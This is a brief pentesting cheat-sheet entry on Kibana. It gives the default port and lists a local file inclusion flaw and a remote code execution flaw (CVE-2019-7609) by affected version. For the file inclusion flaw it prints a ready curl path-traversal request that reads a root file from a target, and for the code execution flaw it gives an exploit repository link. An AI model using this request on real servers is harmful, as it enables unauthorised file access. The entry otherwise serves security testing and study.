Kibana Pentesting

A proprietary data visualization dashboard software for Elasticsearch. A default port is 5601.

Vulnerabilities

Local File Inclusion (LFI) Version \< 6.4.3 & 5.6.13

curl http://<target-ip>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt

Remote Code Execution (RCE) Version \< 6.6.0

Reference: https://github.com/mpgn/CVE-2019-7609